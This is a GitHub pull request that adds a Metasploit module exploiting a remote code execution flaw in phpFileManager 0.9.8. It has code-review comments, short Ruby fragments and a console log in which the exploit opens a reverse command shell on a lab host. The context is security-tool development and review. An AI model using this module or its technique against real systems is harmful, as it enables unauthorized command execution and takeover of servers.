Skip to content
New issue

Have a question about this project? Sign up for a free GitHub account to open an issue and contact its maintainers and the community.

Sign up for GitHub

By clicking “Sign up for GitHub”, you agree to our terms of service and privacy statement. We’ll occasionally send you account related emails.

Already on GitHub? Sign in to your account

Jump to bottom

Add phpFileManager 0.9.8 Remote Code Execution #6303

Merged
merged 9 commits into from Dec 8, 2015
Merged

Add phpFileManager 0.9.8 Remote Code Execution #6303

merged 9 commits into from Dec 8, 2015

Conversation

shipcod3
Copy link
Contributor

@shipcod3 shipcod3 commented Dec 3, 2015

This module exploits a remote code execution vulnerability in phpFileManager 0.9.8 which is a filesystem management tool on a single file.

OJ
OJ reviewed Dec 3, 2015
View reviewed changes
modules/exploits/multi/http/phpfilemanager_rce.rb

if res.nil?
vprint_error("#{peer} - Connection timed out")
return :abort
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

fail_with should be used here. If you return :abort, then line 108 will attempt to send a request to the target with an invalid cookie.

@shipcod3
Copy link
Contributor Author

shipcod3 commented Dec 3, 2015

Corrected the issues @OJ. Thanks man

@OJ OJ added the module label Dec 3, 2015
OJ
OJ reviewed Dec 3, 2015
View reviewed changes
modules/exploits/multi/http/phpfilemanager_rce.rb
],self.class)
end

def check
Copy link
Contributor

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

Why not call http_send_command here?

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

good idea :) I will follow up you with that then

shipcod3
shipcod3 reviewed Dec 3, 2015
View reviewed changes
modules/exploits/multi/http/phpfilemanager_rce.rb
def check
txt = Rex::Text.rand_text_alpha(8)
res = http_send_command("echo #{txt}")

Copy link
Contributor Author

Choose a reason for hiding this comment

The reason will be displayed to describe this comment to others. Learn more.

now using the http_send_command @OJ :)

Tried to check it and works pretty fine
image

@wchen-r7 wchen-r7 self-assigned this Dec 7, 2015
@wchen-r7
Copy link
Contributor

wchen-r7 commented Dec 8, 2015

This works for me:

msf exploit(phpfilemanager_rce) > run

[*] Started reverse double handler
[+] 192.168.1.202:80 - Logged in to the file manager
[*] Accepted the first client connection...
[*] Accepted the second client connection...
[*] Command: echo k7xfT5jxhNUMaKjr;
[*] Writing to socket A
[*] Writing to socket B
[*] Reading from sockets...
[*] Reading from socket A
[*] A: "k7xfT5jxhNUMaKjr\r\n"
[*] Matching...
[*] B is input...
[*] Command shell session 1 opened (192.168.1.199:4444 -> 192.168.1.202:44435) at 2015-12-07 19:20:50 -0600

@shipcod3
Copy link
Contributor Author

shipcod3 commented Dec 8, 2015

@wchen-r7, good to know that it works fine for you too :)

@wchen-r7 wchen-r7 merged commit 3bbc413 into rapid7:master Dec 8, 2015
wchen-r7 added a commit that referenced this pull request Dec 8, 2015
@wchen-r7
Land #6303, Add phpFileManager 0.9.8 Remote Code Execution
53acfd7
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment
Reviewers
No reviews
Assignees

@wchen-r7 wchen-r7

Labels
module
Projects
None yet
Milestone
No milestone
Development

Successfully merging this pull request may close these issues.

None yet
4 participants
@shipcod3 @wchen-r7 @OJ @espreto